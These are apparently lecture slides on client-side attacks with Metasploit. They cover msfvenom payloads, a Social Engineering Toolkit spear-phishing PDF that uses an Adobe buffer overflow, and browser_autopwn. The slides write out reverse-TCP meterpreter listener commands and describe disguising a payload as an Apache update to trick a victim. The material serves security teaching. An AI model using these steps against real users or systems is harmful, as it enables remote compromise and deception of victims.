UNIT 5

Client-Side Attacks with Metasploit

Exploiting Weaknesses Beyond the Network Perimeter

 Client Side Attacks
● Client-side attacks occur when a user downloads malicious content. The flow of data is
reversed compared to server-side attacks: client-side attacks initiate from the victim who
downloads content from the attacker.
● Client-side attacks are difficult to mitigate for organizations that allow Internet access.
Clients include word processing software, spreadsheets, media players, Web browsers, etc.
● Understanding and addressing client-side exploitation are vital components of a
comprehensive cybersecurity strategy. It involves a combination of technical measures,
such as software updates and endpoint protection.
● Some examples of client side attacks are :
● Malvertising
● Cross-Site Scripting (XSS)
● Cross-Site Request Forgery (CSRF)
● Watering Hole Attack
● Session Hijacking
● Zero-Day Exploit
● Malware
Using msfvenom to Generate Custom Payloads
Introduction to msfvenom:
● msfvenom is part of the Metasploit Framework, a comprehensive open-source platform for developing,
testing, and executing exploits. The msfvenom is a separate utility and doesn't require msfconsole to be
running at same time.
● Specifically designed for generating payloads, which are the actual malicious code or shellcode that
attackers use to exploit vulnerabilities.
● msfvenom can generate payloads for different purposes, including reverse shells, bind shells,
meterpreter sessions, shellcode for buffer overflows, and more.
Functionality:
● List payloads: The msfvenom utility supports all standard Metasploit payloads.
● List encoders: As we have discussed earlier, the msfvenom is a single utility,
● which can generate as well as encode the payload. It supports all standard Metasploit encoders. We can
list all the available encoders using the msfvenom --list encoders command,
● List formats: While generating a payload, we need to instruct the msfvenom
● utility about the file format that we need our payload to be generated in. We can
● use the msfvenom --help formats command.
Using msfvenom to Generate Custom Payloads
Generating custom payloads for client-side attacks:
● Let's try generating a sample payload as shown in the following screenshot:

Once we have generated a payload, we need to setup a listener, which would accept
reverse connections once the payload gets executed on our target system. The following
command will start a meterpreter listener on the IP address 192.168.44.134 on port
8080:
msfconsole -x "use exploit/multi/handler; set PAYLOAD
windows/meterpreter/reverse_tcp; set LHOST 192.168.44.134; set LPORT 8080;
run; exit -y"
Now, we have sent the payload
disguised as an Apache update
to our victim. The victim
needs to execute it in order to
complete the exploit:
As soon as the victim executes the apache-update.exe file, we get an active meterpreter
session back on the listener we setup earlier (as shown in the following screenshot):
 Introduction to Social Engineering Toolkit (SET)
● Social engineering is an art of manipulating human behavior in order to bypass the security
controls of the target system.
● The Social Engineering Toolkit (SET) is a powerful open-source tool designed for penetration testers, ethical
hackers, and security professionals to simulate social engineering attacks.
● Kali Linux, by default, has a powerful social engineering tool, which seamlessly integrates with
Metasploit to launch targeted attacks. In Kali Linux, the Social-Engineering Toolkit is located
under Exploitation Tools | Social Engineering Toolkit.

● Features and Capabilities:

Social Engineering Toolkit (SET) offers modular phishing campaigns, website cloning, targeted attacks,
payload customization, and integration with Metasploit for realistic and educational security assessments.
● Leveraging Social Engineering for Client-Side Exploitation:
SET exploits human psychology to deliver custom payloads, manipulates user trust for compromises,
and showcases the bypassing of technical controls for realistic simulations and continuous security
Launching Social Engineering Attacks
Generating malicious PDF:
1. Open the Social Engineering Toolkit and select the first option Spear-Phishing Attack Vectors, as
shown in the following screenshot. Then select the second option Create a File Format Payload:
2. Now, select option 14 to use the Adobe util.printf() Buffer Overflow exploit.

3. Select option 1 to use Windows Reverse TCP Shell as the payload for our exploit. Then,
set the IP address of the attacker's machine using the LHOST variable (in this case, it's
192.168.44.134) and the port to listen on (in this case, 443).

4. Meanwhile, we also need to start a listener, which will accept the reverse meterpreter
connection from our target. We can start a listener using the following command:
msfconsole -x "use exploit/multi/handler; set PAYLOAD
windows/meterpreter/reverse_tcp; set LHOST 192.168.44.134; set LPORT 443;
run; exit -y"

5. On the other end, our victim received the PDF file and tried to open it using Adobe
Reader.
6. Back on the listener end (on the attacker's system), we have got a new meterpreter
shell! We can see this in following screenshot:
Advanced Browser-Based Attacks using browser_autopwn

● The autopwn refers to the automatic

exploitation of the target. The autopwn
module sets up most of the browser-based
exploits in listening mode by automatically
configuring them one after the other.
● On an incoming request from a particular
browser, it launches the set of matching
exploits. Therefore, irrespective of the
browser a victim is using, if there are
vulnerabilities in the browser, the autopwn
script attacks it automatically with the
matching exploit modules.
Techniques for browser-based attacks:

Some browser based attacks are as follows-

1. Cross-Site Scripting (XSS): Injecting malicious scripts into web pages, exploiting user trust to execute unauthorized actions in
their browsers.
2. Drive-By Downloads: Automatically delivering malware when users visit compromised websites, exploiting vulnerabilities in
the browser.
3. Social Engineering: Manipulating users through psychological tactics to click on malicious links or disclose sensitive
information.
4. Man-in-the-Browser (MitB): Installing malware on users' systems to intercept and manipulate web traffic, often targeting login
credentials.
5. Clickjacking: Concealing malicious actions beneath seemingly harmless clickable elements on a webpage.
Overview of browser_autopwn module:
● Browser Autopwn is the easiest and quickest way to explicitly test browser vulnerabilities without having the user
to painfully learn everything there is about each exploit and the remote target before deployment.
● This auxiliary module works in the following sequence:

1. The attacker executes the browser_autopwn auxiliary module.

2. A web server is initiated (on the attacker's system), which hosts a payload. The
payload is accessible over a specific URL.
3. The attacker sends the specially generated URL to his victim.
4. The victim tries to open the URL, which is when the payload gets downloaded
on his system.
5. If the victim's browser is vulnerable, the exploit is successful and the attacker gets a meterpreter shell.
Browser-based attacks using browser_autopwn
1. From the msfconsole, select the browser_autopwn module using the use
auxiliary/server/browser_autopwn command as shown in the following screenshot.
Then, configure the value of the LHOST variable and run the auxiliary module:
2. Running the auxiliary module will create many different instances of exploit/payload
combinations as the victim might be using any kind of browser:
3. On the target system, our victim opened up an Internet Explorer and tried to hit the
malicious URL http://192.168.44.134:8080 (that we setup using the
browser_autopwn auxiliary module):
4. Back on our Metasploit system, we got a meterpreter shell as soon as our victim opened
the specially crafted URL:
Summary
Understanding client-side attack techniques is vital as they exploit human
behavior, often being the entry point for cyber threats. By recognizing and
addressing these tactics like phishing and social engineering, security
professionals can fortify defenses, educate users, and safeguard against the risks
posed by the weakest link in the security chain—individuals and their interactions
with technology.

We learned how to use various tools and techniques in order to launch

advanced client-side attacks and bypass the network perimeter restrictions.
Question & Answers
Opening the floor for Q & A
References
1. Sagar Rahalkar, Nipun Jaswal - The Complete ... oit (2019, Packt Publishing)
2. Himanshu Kumar - Learning Nessus for Penetration Testing_ Master how to perform IT
infrastructure security vulnerability assessments using Nessus (2014, Packt Publishing)
3. Steve Manzuik, Andre Gold, Chris Gatford - Network Security Assesment_from Vulnerability to
Patch (2006, Syngress)
4. https://www.rapid7.com/blog/post/2015/07/15/the-new-metasploit-browser-autopwn-strikes-faster-
and-smarter-part-1/
5. https://www.oreilly.com/library/view/mastering-metasploit/9781788990615/b4495567-b19f-4c70-
a904-65d6f32fa012.xhtml